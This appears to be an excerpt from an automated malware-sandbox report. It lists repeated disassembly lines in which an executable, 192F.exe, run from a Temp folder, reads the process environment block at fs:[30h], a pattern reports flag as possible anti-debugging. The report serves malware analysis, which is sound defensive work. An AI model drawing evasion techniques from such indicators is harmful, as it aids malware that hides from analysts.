Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9170C0 mov eax, dword ptr fs:[00000030h] 29_2_6A9170C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9228FD mov eax, dword ptr fs:[00000030h] 29_2_6A9228FD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9228FD mov eax, dword ptr fs:[00000030h] 29_2_6A9228FD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9228FD mov eax, dword ptr fs:[00000030h] 29_2_6A9228FD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9140E1 mov eax, dword ptr fs:[00000030h] 29_2_6A9140E1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9140E1 mov eax, dword ptr fs:[00000030h] 29_2_6A9140E1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9140E1 mov eax, dword ptr fs:[00000030h] 29_2_6A9140E1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CE0E9 mov eax, dword ptr fs:[00000030h] 29_2_6A9CE0E9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CE0E9 mov eax, dword ptr fs:[00000030h] 29_2_6A9CE0E9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93B8E4 mov eax, dword ptr fs:[00000030h] 29_2_6A93B8E4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93B8E4 mov eax, dword ptr fs:[00000030h] 29_2_6A93B8E4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9158EC mov eax, dword ptr fs:[00000030h] 29_2_6A9158EC
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9EF019 mov eax, dword ptr fs:[00000030h] 29_2_6A9EF019
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9EF019 mov eax, dword ptr fs:[00000030h] 29_2_6A9EF019
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F018 mov eax, dword ptr fs:[00000030h] 29_2_6A91F018
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F018 mov eax, dword ptr fs:[00000030h] 29_2_6A91F018
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E4015 mov eax, dword ptr fs:[00000030h] 29_2_6A9E4015
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E4015 mov eax, dword ptr fs:[00000030h] 29_2_6A9E4015
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916800 mov eax, dword ptr fs:[00000030h] 29_2_6A916800
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916800 mov eax, dword ptr fs:[00000030h] 29_2_6A916800
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916800 mov eax, dword ptr fs:[00000030h] 29_2_6A916800
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A928800 mov eax, dword ptr fs:[00000030h] 29_2_6A928800
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A830 mov eax, dword ptr fs:[00000030h] 29_2_6A93A830
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A830 mov eax, dword ptr fs:[00000030h] 29_2_6A93A830
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A830 mov eax, dword ptr fs:[00000030h] 29_2_6A93A830
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A830 mov eax, dword ptr fs:[00000030h] 29_2_6A93A830
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944020 mov edi, dword ptr fs:[00000030h] 29_2_6A944020
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92B02A mov eax, dword ptr fs:[00000030h] 29_2_6A92B02A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92B02A mov eax, dword ptr fs:[00000030h] 29_2_6A92B02A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92B02A mov eax, dword ptr fs:[00000030h] 29_2_6A92B02A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92B02A mov eax, dword ptr fs:[00000030h] 29_2_6A92B02A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915050 mov eax, dword ptr fs:[00000030h] 29_2_6A915050
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915050 mov eax, dword ptr fs:[00000030h] 29_2_6A915050
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915050 mov eax, dword ptr fs:[00000030h] 29_2_6A915050
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A917055 mov eax, dword ptr fs:[00000030h] 29_2_6A917055
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E1074 mov eax, dword ptr fs:[00000030h] 29_2_6A9E1074
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D2073 mov eax, dword ptr fs:[00000030h] 29_2_6A9D2073
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93F86D mov eax, dword ptr fs:[00000030h] 29_2_6A93F86D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944190 mov eax, dword ptr fs:[00000030h] 29_2_6A944190
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942990 mov eax, dword ptr fs:[00000030h] 29_2_6A942990
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91519E mov eax, dword ptr fs:[00000030h] 29_2_6A91519E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91519E mov ecx, dword ptr fs:[00000030h] 29_2_6A91519E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93C182 mov eax, dword ptr fs:[00000030h] 29_2_6A93C182
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94A185 mov eax, dword ptr fs:[00000030h] 29_2_6A94A185
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DA189 mov eax, dword ptr fs:[00000030h] 29_2_6A9DA189
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DA189 mov ecx, dword ptr fs:[00000030h] 29_2_6A9DA189
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9951BE mov eax, dword ptr fs:[00000030h] 29_2_6A9951BE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9951BE mov eax, dword ptr fs:[00000030h] 29_2_6A9951BE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9951BE mov eax, dword ptr fs:[00000030h] 29_2_6A9951BE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9951BE mov eax, dword ptr fs:[00000030h] 29_2_6A9951BE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C9BF mov eax, dword ptr fs:[00000030h] 29_2_6A94C9BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C9BF mov eax, dword ptr fs:[00000030h] 29_2_6A94C9BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9EF1B5 mov eax, dword ptr fs:[00000030h] 29_2_6A9EF1B5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9EF1B5 mov eax, dword ptr fs:[00000030h] 29_2_6A9EF1B5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov eax, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov eax, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov eax, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov eax, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9461A0 mov eax, dword ptr fs:[00000030h] 29_2_6A9461A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9461A0 mov eax, dword ptr fs:[00000030h] 29_2_6A9461A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D49A4 mov eax, dword ptr fs:[00000030h] 29_2_6A9D49A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D49A4 mov eax, dword ptr fs:[00000030h] 29_2_6A9D49A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D49A4 mov eax, dword ptr fs:[00000030h] 29_2_6A9D49A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D49A4 mov eax, dword ptr fs:[00000030h] 29_2_6A9D49A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9299C7 mov eax, dword ptr fs:[00000030h] 29_2_6A9299C7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9299C7 mov eax, dword ptr fs:[00000030h] 29_2_6A9299C7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9299C7 mov eax, dword ptr fs:[00000030h] 29_2_6A9299C7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9299C7 mov eax, dword ptr fs:[00000030h] 29_2_6A9299C7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B1E1 mov eax, dword ptr fs:[00000030h] 29_2_6A91B1E1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B1E1 mov eax, dword ptr fs:[00000030h] 29_2_6A91B1E1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B1E1 mov eax, dword ptr fs:[00000030h] 29_2_6A91B1E1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9131E0 mov eax, dword ptr fs:[00000030h] 29_2_6A9131E0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A41E8 mov eax, dword ptr fs:[00000030h] 29_2_6A9A41E8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E89E7 mov eax, dword ptr fs:[00000030h] 29_2_6A9E89E7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E9ED mov eax, dword ptr fs:[00000030h] 29_2_6A91E9ED
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919100 mov eax, dword ptr fs:[00000030h] 29_2_6A919100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919100 mov eax, dword ptr fs:[00000030h] 29_2_6A919100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919100 mov eax, dword ptr fs:[00000030h] 29_2_6A919100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A920100 mov eax, dword ptr fs:[00000030h] 29_2_6A920100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A920100 mov eax, dword ptr fs:[00000030h] 29_2_6A920100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A920100 mov eax, dword ptr fs:[00000030h] 29_2_6A920100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913138 mov ecx, dword ptr fs:[00000030h] 29_2_6A913138
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94513A mov eax, dword ptr fs:[00000030h] 29_2_6A94513A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94513A mov eax, dword ptr fs:[00000030h] 29_2_6A94513A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 mov eax, dword ptr fs:[00000030h] 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 mov eax, dword ptr fs:[00000030h] 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 mov eax, dword ptr fs:[00000030h] 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 mov eax, dword ptr fs:[00000030h] 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 mov ecx, dword ptr fs:[00000030h] 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91395E mov eax, dword ptr fs:[00000030h] 29_2_6A91395E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91395E mov eax, dword ptr fs:[00000030h] 29_2_6A91395E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93B944 mov eax, dword ptr fs:[00000030h] 29_2_6A93B944
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93B944 mov eax, dword ptr fs:[00000030h] 29_2_6A93B944
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B171 mov eax, dword ptr fs:[00000030h] 29_2_6A91B171
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B171 mov eax, dword ptr fs:[00000030h] 29_2_6A91B171
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8966 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8966
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DE962 mov eax, dword ptr fs:[00000030h] 29_2_6A9DE962
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DE9E mov eax, dword ptr fs:[00000030h] 29_2_6A94DE9E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DE9E mov eax, dword ptr fs:[00000030h] 29_2_6A94DE9E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DE9E mov eax, dword ptr fs:[00000030h] 29_2_6A94DE9E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913E80 mov eax, dword ptr fs:[00000030h] 29_2_6A913E80
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913E80 mov eax, dword ptr fs:[00000030h] 29_2_6A913E80
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A2EA3 mov eax, dword ptr fs:[00000030h] 29_2_6A9A2EA3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9946A7 mov eax, dword ptr fs:[00000030h] 29_2_6A9946A7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8ED6 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8ED6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9436CC mov eax, dword ptr fs:[00000030h] 29_2_6A9436CC
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9276E2 mov eax, dword ptr fs:[00000030h] 29_2_6A9276E2
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A953EE4 mov eax, dword ptr fs:[00000030h] 29_2_6A953EE4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A953EE4 mov eax, dword ptr fs:[00000030h] 29_2_6A953EE4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A953EE4 mov eax, dword ptr fs:[00000030h] 29_2_6A953EE4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9416E0 mov ecx, dword ptr fs:[00000030h] 29_2_6A9416E0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A2E14 mov eax, dword ptr fs:[00000030h] 29_2_6A9A2E14
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91C600 mov eax, dword ptr fs:[00000030h] 29_2_6A91C600
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91C600 mov eax, dword ptr fs:[00000030h] 29_2_6A91C600
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91C600 mov eax, dword ptr fs:[00000030h] 29_2_6A91C600
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CFE3F mov eax, dword ptr fs:[00000030h] 29_2_6A9CFE3F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C63D mov eax, dword ptr fs:[00000030h] 29_2_6A94C63D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91A63B mov eax, dword ptr fs:[00000030h] 29_2_6A91A63B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91A63B mov eax, dword ptr fs:[00000030h] 29_2_6A91A63B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A950E21 mov eax, dword ptr fs:[00000030h] 29_2_6A950E21
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A6652 mov eax, dword ptr fs:[00000030h] 29_2_6A9A6652
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943E70 mov eax, dword ptr fs:[00000030h] 29_2_6A943E70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CF674 mov eax, dword ptr fs:[00000030h] 29_2_6A9CF674
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CE6C mov eax, dword ptr fs:[00000030h] 29_2_6A94CE6C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CE6C mov ecx, dword ptr fs:[00000030h] 29_2_6A94CE6C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99AE60 mov eax, dword ptr fs:[00000030h] 29_2_6A99AE60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99AE60 mov eax, dword ptr fs:[00000030h] 29_2_6A99AE60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99AE60 mov eax, dword ptr fs:[00000030h] 29_2_6A99AE60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99AE60 mov eax, dword ptr fs:[00000030h] 29_2_6A99AE60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92766D mov eax, dword ptr fs:[00000030h] 29_2_6A92766D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov ecx, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913FC5 mov eax, dword ptr fs:[00000030h] 29_2_6A913FC5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913FC5 mov eax, dword ptr fs:[00000030h] 29_2_6A913FC5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913FC5 mov eax, dword ptr fs:[00000030h] 29_2_6A913FC5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D7CA mov eax, dword ptr fs:[00000030h] 29_2_6A94D7CA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D7CA mov eax, dword ptr fs:[00000030h] 29_2_6A94D7CA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9537F5 mov eax, dword ptr fs:[00000030h] 29_2_6A9537F5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CDF1D mov ecx, dword ptr fs:[00000030h] 29_2_6A9CDF1D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CDF1D mov eax, dword ptr fs:[00000030h] 29_2_6A9CDF1D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944710 mov eax, dword ptr fs:[00000030h] 29_2_6A944710
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93F716 mov eax, dword ptr fs:[00000030h] 29_2_6A93F716
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9AFF10 mov eax, dword ptr fs:[00000030h] 29_2_6A9AFF10
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9AFF10 mov eax, dword ptr fs:[00000030h] 29_2_6A9AFF10
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C707 mov eax, dword ptr fs:[00000030h] 29_2_6A94C707
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C707 mov ecx, dword ptr fs:[00000030h] 29_2_6A94C707
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C707 mov eax, dword ptr fs:[00000030h] 29_2_6A94C707
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916730 mov eax, dword ptr fs:[00000030h] 29_2_6A916730
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916730 mov eax, dword ptr fs:[00000030h] 29_2_6A916730
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916730 mov eax, dword ptr fs:[00000030h] 29_2_6A916730
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94E730 mov eax, dword ptr fs:[00000030h] 29_2_6A94E730
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93B73D mov eax, dword ptr fs:[00000030h] 29_2_6A93B73D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93B73D mov eax, dword ptr fs:[00000030h] 29_2_6A93B73D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914F2E mov eax, dword ptr fs:[00000030h] 29_2_6A914F2E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914F2E mov eax, dword ptr fs:[00000030h] 29_2_6A914F2E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 29_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 29_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 29_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 29_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 29_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91A745 mov eax, dword ptr fs:[00000030h] 29_2_6A91A745
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DF4C mov eax, dword ptr fs:[00000030h] 29_2_6A94DF4C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916F60 mov eax, dword ptr fs:[00000030h] 29_2_6A916F60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916F60 mov eax, dword ptr fs:[00000030h] 29_2_6A916F60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93E760 mov eax, dword ptr fs:[00000030h] 29_2_6A93E760
